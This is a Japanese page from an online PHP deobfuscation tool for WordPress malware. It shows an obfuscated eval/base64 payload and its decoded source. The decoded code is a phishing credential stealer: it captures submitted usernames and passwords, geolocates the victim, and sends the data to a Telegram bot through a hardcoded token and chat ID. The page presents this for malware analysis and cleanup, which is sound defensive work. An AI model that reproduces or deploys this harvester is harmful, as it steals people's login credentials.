PHP 難読化コードの復元・デコード

Wordpress　等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php eval(base64_decode('CiBnb3RvIEYzUjFBOyBtc0tOdTogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFwxNjdceDY1Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJceDY1XHg2ZFwxNDEiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NzBceDc3XHg2NSJdKSA+IDYwKSB7ICRuYW1lRXJyID0...

難読化されたPHPコード

<?php eval(base64_decode('CiBnb3RvIEYzUjFBOyBtc0tOdTogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFwxNjdceDY1Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJceDY1XHg2ZFwxNDEiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NzBceDc3XHg2NSJdKSA+IDYwKSB7ICRuYW1lRXJyID0gIlx4MjAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXDE0NVx4NmRceDYxIl0pIDwgMSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlwxNjBceDc3XDE0NSJdKSA8IDEpIHsgJG5hbWVFcnIgPSAiXDQwIjsgfSBlbHNlIHsgJGVtYSA9ICRfUE9TVFsiXDE0NVx4NmRcMTQxIl07ICRwd2UgPSAkX1BPU1RbIlx4NzBcMTY3XDE0NSJdOyAkaXBfYWRkcmVzcyA9ICRfU0VSVkVSWyJceDUyXHg0NVx4NGRcMTE3XDEyNFx4NDVcMTM3XDEwMVx4NDRceDQ0XHg1MiJdOyAkbG9jYXRpb24gPSBqc29uX2RlY29kZShmaWxlX2dldF9jb250ZW50cygiXHg2OFwxNjRceDc0XHg3MFw3Mlx4MmZcNTdceDY5XDE2MFwxNTFceDZlXDE0NlwxNTdceDJlXDE1MVwxNTdcNTd7JGlwX2FkZHJlc3N9XDU3XHg2YVx4NzNcMTU3XDE1NiIpKTsgJGNvdW50cnkgPSAkbG9jYXRpb24tPmNvdW50cnk7ICRzdGF0ZSA9ICRsb2NhdGlvbi0+cmVnaW9uOyAkY2l0eSA9ICRsb2NhdGlvbi0+Y2l0eTsgJGJvdFRva2VuID0gIlx4MzhcNjJceDM0XHgzM1w2MVw3MVx4MzVceDM3XHgzM1w2NVx4M2FceDQxXDEwMVwxMDdceDY4XDE2NFx4MzFcMTE1XHg3N1wxNTFceDQzXHg2N1wxNzBcMTYxXHg3MlwxMTRcMTE1XHg2ZVx4NTVceDRjXHg0ZVx4NmFceDVhXHgzOFwxMTZcMTQ0XDE0Mlx4NjVceDcyXDE1Mlx4NzlceDQxXHg3MVx4MzVceDRmXHg0OSI7ICRjaGF0SWQgPSAiXDYxXDYxXDY3XDYyXHgzNFx4MzZcNjZceDM0XHgzNlx4MzMiOyAkdXJsID0gIlx4NjhcMTY0XHg3NFwxNjBceDczXDcyXDU3XHgyZlwxNDFcMTYwXDE1MVx4MmVceDc0XHg2NVx4NmNceDY1XDE0N1x4NzJceDYxXHg2ZFx4MmVceDZmXDE2MlwxNDdceDJmXDE0MlwxNTdcMTY0eyRib3RUb2tlbn1ceDJmXDE2M1x4NjVceDZlXDE0NFwxMTVceDY1XDE2M1x4NzNcMTQxXDE0N1wxNDVcNzdceDYzXHg2OFwxNDFceDc0XDEzN1wxNTFcMTQ0XHgzZHskY2hhdElkfVw0NlwxNjRcMTQ1XDE3MFwxNjRcNzVcMTY1XHg3M1wxNDVceDcyXDE1NlwxNDFceDZkXDE0NVx4M2FceDIweyRlbWF9XDQ1XHgzMFwxMDFcMTYwXDE2N1x4M2FceDIweyRwd2V9XHgyNVw2MFwxMDFceDQzXHg2Y1wxNTFcMTQ1XHg2ZVx4NzRcNDBceDY5XDE2MFx4M2FceDIweyRpcH1ceDI1XHgzMFwxMDFcNzVceDNkXDc1XDc1XDc1XHgzZFw3NVw3NVx4M2RceDNkXHgzZFw3NVw3NVw1M1x4MjBceDViXDQwXHg0M1wxNjJceDY1XDE0MVx4NzRceDY1XDE0NFw0MFwxNDJceDc5XDQwXDExN1x4NmRcMTQ1XHg0N1x4NjFcMTE0XDE1N1x4NzJceDQ0XHgyMFx4NWRcNDBcNTNcNzVcNzVceDNkXHgzZFw3NVw3NVw3NVw3NVw3NVx4M2RcNzVceDNkXDc1IjsgJHN0cmVhbU9wdGlvbnMgPSBhcnJheSgiXDE2M1wxNjNceDZjIiA9PiBhcnJheSgiXHg3Nlx4NjVceDcyXDE1MVx4NjZceDc5XHg1ZlwxNjBcMTQ1XDE0NVx4NzIiID0+IGZhbHNlLCAiXHg3NlwxNDVceDcyXHg2OVx4NjZceDc5XDEzN1wxNjBcMTQ1XHg2NVwxNjJcMTM3XDE1Nlx4NjFceDZkXDE0NSIgPT4gZmFsc2UpLCAiXDE1MFx4NzRcMTY0XDE2MCIgPT4gYXJyYXkoIlx4NmRcMTQ1XDE2NFx4NjhceDZmXHg2NCIgPT4gIlwxMjBceDRmXDEyM1wxMjQiKSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRzdHJlYW1PcHRpb25zKTsgJGhhbmRsZSA9IGZvcGVuKCR1cmwsICJcMTYyIiwgZmFsc2UsICRjb250ZXh0KTsgJHJlc3BvbnNlID0gc3RyZWFtX2dldF9jb250ZW50cygkaGFuZGxlKTsgZmNsb3NlKCRoYW5kbGUpOyBlY2hvICRyZXNwb25zZTsgfSBnb3RvIG43VXF0OyBwWmlORjogaWYgKGVtcHR5KCRfUE9TVFsiXHg2NVwxNTVceDYxIl0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZ290byBtc0tOdTsgRjNSMUE6IHNlc3Npb25fc3RhcnQoKTsgZ290byBwWmlORjsgbjdVcXQ6IA==')); ?>

デコード(難読化解除)されたコード

<?php

eval {
    session_start();
    if (empty($_POST["ema"])) {
        $nameErr = " ";
    }
    if (empty($_POST["pwe"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["ema"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["pwe"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["ema"]) < 1) {
        $nameErr = " ";
    } elseif (strlen($_POST["pwe"]) < 1) {
        $nameErr = " ";
    } else {
        $ema = $_POST["ema"];
        $pwe = $_POST["pwe"];
        $ip_address = $_SERVER["REMOTE_ADDR"];
        $location = json_decode(file_get_contents("http://ipinfo.io/{$ip_address}/json"));
        $country = $location->country;
        $state = $location->region;
        $city = $location->city;
        $botToken = "8243195735:AAGht1MwiCgxqrLMnULNjZ8NdberjyAq5OI";
        $chatId = "1172466463";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=username: {$ema}%0Apw: {$pwe}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] +=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
};

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります